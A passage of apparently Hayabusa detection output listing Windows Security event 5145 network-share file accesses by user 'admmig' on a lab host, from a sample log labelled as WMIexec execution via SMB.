Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.600 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.600 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.600 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.600 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.600 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.600 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.616 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.662 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.678 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.678 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.678 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.678 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.694 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.694 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.725 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.725 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.741 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.741 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.756 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.756 